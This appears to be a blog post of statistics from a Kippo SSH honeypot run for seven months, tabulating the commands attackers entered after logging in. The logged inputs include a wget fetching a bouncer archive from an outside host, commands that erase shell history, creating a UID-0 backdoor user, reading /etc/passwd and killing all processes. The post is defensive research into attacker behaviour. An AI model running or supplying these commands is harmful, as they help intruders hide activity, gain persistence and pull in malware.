Kippo Statistics

During 7 months I ran a kippo (1) SSH honeypot on my VPS that I’m using for security research. I used kippo-graph (2) to generate these nice graphics from my kippo database. Below you can find some interesting statistics.

To be on the safe site, unfortunately I had to remove the ‘executed wget commands’, as most of them contained links to malware.

top10_passwords

connections_per_ip_pie

connections_per_ip

logins_from_same_ip

most_probes_per_day

most_successful_logins_per_day

probes_per_day

probes_per_week

success_ratio

successes_per_day

successes_per_week

top10_combinations_pie

top10_combinations

top10_passwords

top10_ssh_clients

top10_usernames

Input presentation and statistics gathered from the honeypot system




Overall post-compromise activity

Post-compromise human activity
Total number of commands Distinct number of commands
430 184
Downloaded files
Total number of downloads Distinct number of downloads
24 22

Human activity inside the honeypot

The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation.

Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.



Top 10 input (overall)

The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system.

ID Input Count
1 w 44
2 ls 23
3 echo “WinSCP: this is end-of-file:0″ 20
4 uname -a 16
5 exit 16
6 cat /proc/cpuinfo 15
7 ps x 10
8 ls -a 10
9 cat /etc/issue 10
10 wget 9

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.



Top 10 successful input

The following table diplays the top 10 successful commands entered by attackers in the honeypot system.

ID Input (success) Count
1 w 44
2 ls 23
3 echo “WinSCP: this is end-of-file:0″ 20
4 uname -a 16
5 exit 16
6 cat /proc/cpuinfo 15
7 ps x 10
8 ls -a 10
9 cat /etc/issue 10
10 wget 9

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.



Top 10 failed input

The following table diplays the top 10 failed commands entered by attackers in the honeypot system.

ID Input (fail) Count
1 perl 9
2 make 3
3 perl -v 3
4 { 3
5 } 3
6 gcc 2
7 unaem -a 2
8 ./au 1
9 14ddoszone.altervista.org sbnc.tgz 1
10 14ddoszone.altervista.org sbnc.tgzwget http://www.freewebs.com/gbl-net/psyBNC.tar.gz 1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.



passwd commands

The following table diplays the latest “passwd” commands entered by attackers in the honeypot system.

ID Timestamp Input
1 Wednesday, 21-Aug-2013, 16:54 PM bucea123
2 Tuesday, 02-Apr-2013, 18:27 PM hansol123
3 Friday, 08-Feb-2013, 13:27 PM tudorioan1911

Executed scripts

The following table diplays the latest executed scripts by attackers in the honeypot system.

ID Timestamp Input
1 Tuesday, 23-Jul-2013, 16:59 PM ./a 59.188
2 Friday, 19-Jul-2013, 17:29 PM ./bash
3 Wednesday, 19-Jun-2013, 09:15 AM ./ss
4 Friday, 07-Jun-2013, 15:15 PM ./go
5 Tuesday, 30-Apr-2013, 16:10 PM ./
6 Wednesday, 27-Mar-2013, 00:50 AM ./setup 123456 9
7 Friday, 22-Mar-2013, 07:18 AM ./k-i686
8 Saturday, 02-Feb-2013, 16:24 PM ./autorun
9 Saturday, 02-Feb-2013, 16:24 PM ./au

Interesting commands

The following table diplays other interesting commands executed by attackers in the honeypot system.

ID Timestamp Input
1 Friday, 09-Aug-2013, 22:02 PM cat /proc/memoinfo
2 Friday, 02-Aug-2013, 11:41 AM cat /pcat /proc/cpuinfo
3 Friday, 02-Aug-2013, 11:41 AM cat /proc/meminfo
4 Tuesday, 23-Jul-2013, 21:28 PM adduser test
5 Tuesday, 23-Jul-2013, 21:28 PM cat /etc/passwd
6 Friday, 19-Jul-2013, 17:24 PM cat /etc/hosts
7 Monday, 20-May-2013, 17:46 PM cat messages
8 Monday, 20-May-2013, 17:46 PM cat m
9 Tuesday, 14-May-2013, 04:09 AM ssh -v
10 Tuesday, 02-Apr-2013, 18:26 PM adduser pici
11 Sunday, 31-Mar-2013, 17:11 PM strings /usr/sbin/sshd | grep %s:%s -A2 -B2
12 Sunday, 31-Mar-2013, 17:11 PM unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
13 Sunday, 31-Mar-2013, 17:11 PM export HISTFILE=/dev/null
14 Wednesday, 27-Mar-2013, 00:52 AM kill -9 -1
15 Wednesday, 27-Mar-2013, 00:50 AM cd .sshd
16 Wednesday, 27-Mar-2013, 00:50 AM cd /dev/shm
17 Wednesday, 27-Mar-2013, 00:49 AM cat /etc/issue
18 Thursday, 21-Feb-2013, 06:38 AM ifconfig
19 Friday, 08-Feb-2013, 13:27 PM /usr/sbin/useradd -o -u 0 bonzo
20 Friday, 08-Feb-2013, 13:27 PM cat /proc./cpuinfo
21 Thursday, 07-Feb-2013, 09:04 AM echo “WinSCP: this is end-of-file:0″
22 Thursday, 07-Feb-2013, 09:03 AM cat /proc/cpuinfo

apt-get commands

The following table diplays the latest “apt-get”/”aptitude” commands entered by attackers in the honeypot system.

ID Timestamp Input
1 Monday, 20-May-2013, 17:49 PM apt-get install apt dpkg aptitude
2 Monday, 20-May-2013, 17:49 PM apt-get install vi
3 Monday, 20-May-2013, 17:44 PM apt-get install find
4 Sunday, 31-Mar-2013, 17:12 PM apt-get install perl

[1] https://code.google.com/p/kippo/
[2] http://bruteforce.gr/kippo-graph